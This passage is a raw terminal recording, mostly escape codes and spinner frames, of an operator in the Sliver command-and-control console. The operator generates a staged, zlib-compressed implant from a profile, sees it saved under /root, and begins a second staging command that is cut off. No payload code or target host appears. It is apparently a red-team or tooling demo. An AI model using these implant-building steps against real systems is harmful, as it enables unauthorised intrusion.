\u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mzl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[29D\u001b[9C\u001b[214D\u001b[29C\u001b[?25h"] +[12.807141, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.808394, "o", "\u001b[6n"] +[12.811193, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mzli\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[12.812156, "o", "\u001b[214D\u001b[1A\u001b[30D\u001b[9C\u001b[214D\u001b[30C\u001b[?25h"] +[12.912585, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.915424, "o", "\u001b[6n"] +[12.921074, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mzlib\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.922124, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[31D\u001b[9C\u001b[214D\u001b[31C\u001b[?25h"] +[13.067215, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.071655, "o", "\u001b[6n"] +[13.07822, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mzlib \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[32D\u001b[9C"] +[13.079424, "o", "\u001b[214D\u001b[32C\u001b[?25h"] +[13.477401, "o", "\u001b[1 q"] +[13.514129, "o", "\u001b[1 q"] +[13.514287, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.51665, "o", "\u001b[6n"] +[13.519025, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mzlib rubyc2profile \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.519355, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[46D\u001b[9C\u001b[214D\u001b[46C\u001b[?25h"] +[14.27721, "o", "\u001b[46D\u001b[9C\u001b[6n"] +[14.294504, "o", "\u001b[214D\u001b[46C\u001b[0J\u001b[214D\r\r\n"] +[14.297147, "o", "\u001b[0 q\r\n"] +[14.429556, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[14.530618, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[14.635231, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[14.739895, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[14.840814, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[14.94208, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[15.043267, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[15.14769, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[15.249087, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[15.349774, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[15.450561, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[15.551188, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[15.652064, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[15.756974, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[15.857802, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[15.958113, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[16.058427, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[16.159199, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[16.260288, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[16.361214, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[16.462186, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[16.562509, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[16.665161, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[16.765818, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[16.867133, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[16.967834, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[17.068846, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[17.169742, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[17.269743, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[17.370246, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[17.471269, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[17.572067, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[17.672828, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[17.773239, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[17.876465, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[17.976632, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[18.077616, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[18.178235, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[18.27912, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[18.379433, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[18.480281, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[18.581313, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[18.682065, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[18.782525, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[18.88271, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[18.983072, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[19.084287, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[19.184909, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[19.287115, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[19.387491, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[19.490696, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[19.594053, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[19.694672, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[19.796222, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[19.900206, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[20.00108, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[20.102462, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[20.202889, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[20.303448, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[20.408052, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[20.512542, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[20.61407, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[20.714608, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[20.815173, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[20.915681, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[21.016701, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[21.117327, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[21.217537, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[21.324629, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[21.425546, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[21.526436, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[21.626874, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[21.727917, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[21.828887, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[21.929501, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[22.029909, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[22.131125, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[22.232317, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[22.333144, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[22.434053, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[22.535025, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[22.635631, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[22.736253, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[22.836866, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[22.937344, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[23.038226, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[23.139095, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[23.239351, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[23.340027, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[23.441286, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[23.542779, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[23.643497, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[23.744768, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[23.846014, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[23.94673, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[24.047733, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[24.149092, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[24.251603, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[24.352526, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[24.454351, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[24.55628, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[24.657371, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[24.75848, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[24.859267, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[24.959461, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[25.060564, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[25.162727, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[25.263343, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[25.363693, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[25.464516, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[25.565162, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[25.665796, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[25.767067, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[25.867645, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[25.968199, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[26.069678, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[26.170443, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[26.271219, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[26.372533, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[26.477293, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[26.582258, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[26.682832, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[26.783782, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[26.884469, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[26.98542, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[27.085883, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[27.186681, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[27.291383, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[27.39224, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[27.493164, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[27.594256, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[27.694824, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[27.799652, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[27.90059, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[28.001093, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[28.104266, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[28.207097, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[28.307733, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[28.408469, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[28.509457, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[28.609773, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[28.710493, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[28.810968, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[28.911542, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[29.016191, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[29.116258, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[29.219709, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[29.320483, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[29.421196, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[29.523246, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[29.627781, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[29.728322, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[29.829048, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[29.930456, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[30.033489, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[30.135195, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[30.235792, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[30.33956, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[30.442875, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[30.543678, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[30.647029, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[30.747572, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[30.849218, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[30.949794, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[31.050715, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[31.155215, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[31.25875, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[31.360436, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[31.464106, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[31.56458, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[31.665079, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[31.769546, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[31.872848, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[31.974784, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[32.075555, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[32.1755, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[32.233803, "o", "\r\u001b[2K"] +[32.245108, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /root/VISITING_PERFUME\r\n"] +[32.245289, "o", "\r\n"] +[32.253888, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[32.254289, "o", "\u001b[1 q"] +[32.25471, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.256764, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D"] +[32.257528, "o", "\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[34.128204, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.142499, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[34.201996, "o", "\u001b[?25l"] +[34.20325, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.207005, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[34.207858, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[34.310293, "o", "\u001b[?25l\u001b[214D"] +[34.31141, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.323865, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C"] +[34.32553, "o", "\u001b[214D\u001b[12C\u001b[?25h"] +[34.4571, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.462641, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[34.571084, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[34.572672, "o", "\u001b[6n"] +[34.577385, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[34.578663, "o", "\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[34.657516, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[34.658457, "o", "\u001b[6n"] +[34.662102, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[34.701732, "o", "\u001b[?25l"] +[34.703431, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.708377, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[34.70947, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[34.774173, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.778799, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[34.78038, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[34.922786, "o", "\u001b[?25l"] +[34.924334, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.927708, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[35.134338, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.14535, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.146441, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[35.292762, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.319607, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mst\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[35.51449, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.521553, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22msta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[35.523198, "o", "\u001b[214D\u001b[1A\u001b[21D\u001b[9C\u001b[214D\u001b[21C\u001b[?25h"] +[35.769543, "o", "\u001b[?25l"] +[35.774309, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.785456, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstag\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[35.787261, "o", "\u001b[214D\u001b[1A\u001b[22D\u001b[9C\u001b[214D\u001b[22C\u001b[?25h"] +[35.895696, "o", "\u001b[?25l"] +[35.901469, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.906875, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.90735, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[23D\u001b[9C\u001b[214D\u001b[23C\u001b[?25h"] +[36.017525, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[36.030982, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[36.031216, "o", "\u001b[1A\u001b[24D\u001b[9C\u001b[214D\u001b[24C\u001b[?25h"] +[36.93346, "o", "\u001b[?25l"] +[36.938342, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[36.945478, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[25D"] +[36.94629, "o", "\u001b[9C\u001b[214D\u001b[25C\u001b[?25h"] +[38.839397, "o", "\u001b[?25l"] +[38.84835, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.85532, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[38.855651, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[26D\u001b[9C\u001b[214D\u001b[26C\u001b[?25h"] +[39.005073, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[39.006455, "o", "\u001b[6n"] +[39.010547, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[27D\u001b[9C\u001b[214D\u001b[27C"] +[39.011456, "o", "\u001b[?25h"] +[39.519987, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.527033, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[39.527532, "o", "\u001b[214D\u001b[1A\u001b[28D\u001b[9C\u001b[214D\u001b[28C\u001b[?25h"] +[39.787197, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.797778, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m12\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[39.799188, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[29D\u001b[9C\u001b[214D\u001b[29C\u001b[?25h"] +[39.999132, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.011313, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m123\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[30D\u001b[9C\u001b[214D\u001b[30C\u001b[?25h"] +[40.311038, "o", "\u001b[?25l"] +[40.317247, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.323526, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A"] +[40.324193, "o", "\u001b[31D\u001b[9C\u001b[214D\u001b[31C\u001b[?25h"] +[40.447177, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.46285, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[40.465862, "o", "\u001b[214D\u001b[1A\u001b[32D\u001b[9C\u001b[214D\u001b[32C\u001b[?25h"] +[40.895034, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.900167, "o", "\u001b[6n"] +[40.907879, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[33D\u001b[9C\u001b[214D\u001b[33C\u001b[?25h"] +[41.287085, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[41.29009, "o", "\u001b[6n"] +[41.296285, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[41.297899, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[34D\u001b[9C\u001b[214D\u001b[34C\u001b[?25h"] +[41.687377, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[41.693329, "o", "\u001b[6n"] +[41.701093, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[41.702305, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[35D\u001b[9C\u001b[214D\u001b[35C\u001b[?25h"] +[42.727279, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[42.735408, "o", "\u001b[6n"] +[42.741655, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[36D\u001b[9C\u001b[214D\u001b[36C\u001b[?25h"] +[42.971052, "o", "\u001b[?25l"] +[42.971939, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[42.983551, "o", "\u001b[6n"] +[42.988518, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mgz\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[37D\u001b[9C\u001b[214D"] +[42.989979, "o", "\u001b[37C\u001b[?25h"] +[43.121318, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[43.12898, "o", "\u001b[6n"] +[43.133523, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mgzi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[43.134619, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[38D\u001b[9C\u001b[214D\u001b[38C\u001b[?25h"] +[43.179021, "o", "\u001b[?25l"] +[43.18039, "o", 